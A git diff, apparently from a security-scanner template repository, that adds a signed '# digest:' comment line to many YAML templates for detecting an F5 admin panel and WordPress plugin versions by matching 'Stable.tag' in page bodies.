.../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index 0e2f2d217e..e2b24780b6 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -39,3 +39,4 @@ http: group: 1 regex: - 'Copyright\s+([0-9\-]+),' +# digest: 4a0a00473045022100e99fab204a0926a30dbdc779006365d2dd7053eb0951b7e88d2c421b7c90c47e02203463f43a9b2badb536c120917354b7de6b7c4ad06781dd6447d6ec25768cc3c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..bcf1cea0d7 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009e3076ae8a27cd309fd2ca5325741bdd59bb2b5543a463fa9997ac6c130747e2022100fcd5e57a53b7213c0e4f0c2a672a3384bc086895b325061b5dbebf1086de497e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..3f24601352 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014ce7c0619240471c7a7b42f914bda802ecc002d40aa437ff183b7443b0059f30220150eb70e474c065fb52e75b60b0c943c7d80c0952c22e7b81126c5a0a3bfb2bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..e73fb10b05 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089bf1f6b56884de103aefa1fce048610e38e68eb8134cdb3f84597406f22e95f02201f12088da4e6078d19309014b2d41d4d2c8dfd11aa57dd109c0f8ba38e07b652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..08d84c5371 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203275413e7b312ad52f4de46ff746693678bbf5c282d19796c1b2d8117606a840022100ef10a9263f4aebdce15eb1fd8fc03930341f2a478b0c38a75d9a0e96ae6c7f71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..1c5fa546bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021257a2d4d9057ffab4365d7cd463bf9d0465be005c5682c8cd3e3eb26690abc022100b07febf88d29df1ec853b0ebd8890a06d39a60a707b64842c033f2d432c6f7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..4e2038f2b8 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a775ab47573b4d8a3efef77ac010adf4c63f0989b9420717d1da8fba825277b2022100d7b511ee4015ebc0ad0192ceb89a2add8fdb18b324ba7cfa3ca3873239773b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..ffeee10b41 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071e2956a9a815dd665806ce19a05a03a847e4296e218eb0574953ca7f218db990221009fc414157a9ea649fcc0deb7884f32c4c6863f5cf5f487babdc777c6de32408b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..c148ea890b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100850597b0a63b62d8888654de84df8e1688653af0b50fa17f833def480be0556f02206ca181f1c5ac934ccfab291a3db6a2d39d58a4505896d2c93214903302addb9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..6a5baaa663 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d15243e8c4b71531796e4a0097ffd40fc1d0fd01e2d2b93df04d0dd89305726a022100f3fe432975b77b62338abac52ea0f1023d056ec167b86459c23a9ea1da80ed33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..9284d9ab83 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022042f489f2acbfac0b44a3e9737c1cdda7da880b1e256cf6bc9a8038e6af1e9094022100e3519557cfb18c520052964285359d1858403c3ad6aff9cbe8313e38df44e2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..02aae718cd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022059aefc69835160d182daedb5b72ce377b3f332df04ae1bbd15258e4423ca6fa6022100cda5ae2fa950406bdf93c7ac1495c6da9137248a746095cb35c0863b09b4d2f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..1a5549f1f1 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079c72dec52bea72073ddd3ff619c2a30360605e46ef6bf5b655149e681011557022100d43a68ba5a4be646aa9d945c3d19e3c3b3cc47dd6f41d0dedbd25a66416e793f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..feb7d746e8 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007dae5105d3e535efbadae3989d1b35a33813c78babf6969cb6fc0812b8cd3b402204a1269fd9d0555e0dd3db37b01f3655ed7716330a97f33d71c17ca58fc263b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..34b8646b79 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fdb90930eb827d6a012c92c1cc01aed1a965c28ca4ad995d468fc93bd91b7c57022047e42a372718116fbaa58f68d3e9a4e92cdf6620c0f04d6f6ba10c5e6a794067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..173ead5870 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ac3f323716588786298519b1d13645e31caf4c87491326a7f05a058fd65a1e102203c1fa8b4e65584eae1938733bce084b7b9e5211bd78a284af8be2f39749708b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..d47c9584ec 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220285e192d72d981b897fea3102c63001c4fbef2839cd87c3c35d10a4544441b2f022070e314ebe5d750a7540a1d39091ea7d13470bfa87f26aa98749b3b9a4b3af61f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..a4a64b7faf 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf278e470205131067df70b2eccf9967a5497e69ce419d34359202fc992272ad022100cdd78125aa63387b31597537873a2561840cf12d316ba7d505c1f5a670cf9baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..d2a31c870c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c15ee3aedfe38775c10d0369c53e6a85a2e299accef73b4b4ba374abe1c8f0302206e2194b81c7cef4d62baca45504319cc96473d9749e0977d4277fb5eda9c51c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..800109bf68 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f234ac201cb35effcb4397ac16be0ce6d8f1a50ac577b77ca7e3d8e817485be002203ecb3f64b92f38a5dc0ddfefc1ce06674d62d8b8d778fb4476545fed916c098b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..46467dae4e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207574f8ea2be4a995f04905f4f05c5b70d163a9efbc5bdaa73ad5e542738fd967022100c4603534355d76531118aa2e876a442b9facab57d80b3b58b38fda7bddb24672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..ec0e1f50c6 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022034fc78d9437cf000a0188b0382324f5442c93e245c8ba42ce31ab42159dadee0022100e7584e193db3be1d91148b7e3c6676e7d383914911418151c3182e3874378984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..1250f183af 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f8f87c7ae6cf98c9604135cbc9402c2e97ae39b836f4f67ed5c103dfa78cde5022100a694caaa5cb8f2e3e055ff249d058bde74fa2c76fb0ed58fe37aa52b2380a43b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..d28ec09273 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204462e6c7fbf724b0a5bae781f7f2159d427ef5465b70ef230cfbded8a620bb8d0220065698df7713361de9aa3aff78d4232a1a02ebe25f203f84a5d2dc9416921716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..b644dc72c6 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068e1f84be31999f28f783e6cac3f948f22b32ce8e39284c59b78efb46d7950790220030ba4c483e72c97ce4db1837f2c9cafaad1c75ffcced189a76455323296e0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..43e0145b7a 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100953fdc647f76708439a94d8c88e2707510c8fcc033a997c79c8eabe1c85c21780220540d1250df41bcd8842c2e0d00dacb4f3b03af76a5ef300bc7d16701b8a07501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..3c4c673d6e 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100adec33f7eb0b439615ac6dcd11305d38a2699ecd889f6b21dcd02ee6090cb78e02203b1dabf3f291fb5386cff2f279003fd4cf94d5d8329507af8dadf577675f28f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..d47d669a4b 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009351caae4757095fc9306aa8f65443b417e2bb6e4cf21432d87597ffffb97e8802201ef4aaae6c05863f89f9a9f945407f0dcef9efafacaeff7fa0a57274a7be4c42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..1830095eff 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f3d99c1914c8b6958c8f8023b8cc3fb51b5d1090bbd1d13b9ee0620b765850a202200395cf514cb100ba65f4f95f586d66a3fc4ef2af77e8f36c24747039171b8b18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..364d436fbd 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044e324c93ed25f15febca824e87ba8547d225b54c564dd23710a6c7489d1698402203aa5ac8880367d158e57977cf39f4877c86dfe3f6fc7c1f144cd7a5aee31cde0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..544f5df98c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052b09655a5d523247b7d552a5d6ec02d41955ed8411bec2ee53f7bd44d1c959d022045ae3c841c2c4602024a719351aa730054ac628ebd9b5bf623ccd9ef1b27a590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..ccda139d66 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c4309e7d1683ada0e2f7b36500028e0755f4059714a8d69dc89f6f7bf65509302205f0f94eaec5fc5accca197e4b9126d388dd6afdc1735aa4718e37db35d23eff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..591bccceb6 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad157c3dc7854cf0fc622851921b39e1f65821ce62890423f6e4bbf772477db70220163de00d088d74fbdb99ab08f50ce1c51500664f36612759e56c90fdff5be1fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..890476657d 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8c2142d713469aa2b756dbe34d5b6c5a667a7e3d91f8de14b7e1a47ee6eb87902205be97175e49659bfffe189f2a6e2fe4c42856d874ffdc3f8c778786eb1fef4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..3b91c94544 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7ca4f86c1cd564a2f17c3e488f20b5d1e804c795e3ef829b023534d8e0cb0f8022100becc283d19e464f0c7a08d50d60d80862660d2a50b159302c2cfb66056e164ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..760e492735 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100913f041ce4d25161b63c6eb9e087b38f79dca4934e760ac1251f120a007981f5022100a992f3c5ae98013f010044eec7e2cf80ef715fc8722992b7df059131d2f77693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..134ad64347 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100efcc2d80a463e42db3cec3a7b0ec02562d984009a2fa8863feb54c70a3814b45022032c8c8552b06b11a9ae602c257e6939cd7927c5beb1252b517ea66eb7352e22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..cd3c2debbe 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210096a1b9df97dcbc074eccc12a4e2922e5fe4ca2204bceefce2962daec2c120fa10221008ba8ea9c9f4ee4716db1c5fda2dd644d5a71cc9c0f8a9a1e2cb0fc0873cb3958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..28a27542cd 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d01a8846768169b032baa5816615164fbf8a509a2ad99fbab4acde9550ac83bb02210080319cf46288f15de90ce5e72556c224d0f6f56a66e935a4ad0ac6eeb48a0e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..2fb1cbad32 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210090ceaf341a75aa4aa666507ccbe1788f542fc596f9fd8adab88f9db821eb2d55022100a87e6aff64932bf9e86c2bfd33a55a49888f19fe037f46148ebe64ccb312a217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..6099d78ae4 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bc97b984bf0f0170b96341265017519f7dc78019cbd162cef3be5bb989827112022076f9b1af922298f2e2b787aea00cebcd67ab19a0f5647e3f656e67f6faadfec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..6dbd4ad3f4 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b94bb6931d74123cd6291011d17df62d7286ddbe5501fee3a03c6bc18cbe456022100b06999aa0a33540cf0713390096ea18be2937a19734ce5bc04660b073e251e9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..732747398e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022032da01c5f0d51eb8414b08dfb0d285ca1ad7fe403e38e75f178d19216fe1c2f402202769f9f214a574abfc7e4b3bc4798d7b5000c0b600d863002e9520507b956f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..c0fb7dec47 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220780ce95c8359b53a81c36cdf3824f58447f2ca401bf6d271e254fe2ffabf614402203be1f78fd2b551101261c568e8b1022287f02db51505b90477d57e71e451ed21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..a092ea45c8 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100daaa364f050a0fca3297048e1d6d2607ffa364871ad34a1aa975a86a16919715022100d6d99fac5da9490a61e34db6c41b28429451172f218a6ce56a25d03e8bb2d9bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..7a73c04892 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100877910f69299e0f8c61a186333e1b8122b9cb080db1442d0907e908a7681906c0220233562fb0a1dd56f6c42014d5b38d29b944c0420422ce404a14730bad1dda8f2:922c64590222798bb761d5b6d8e72950 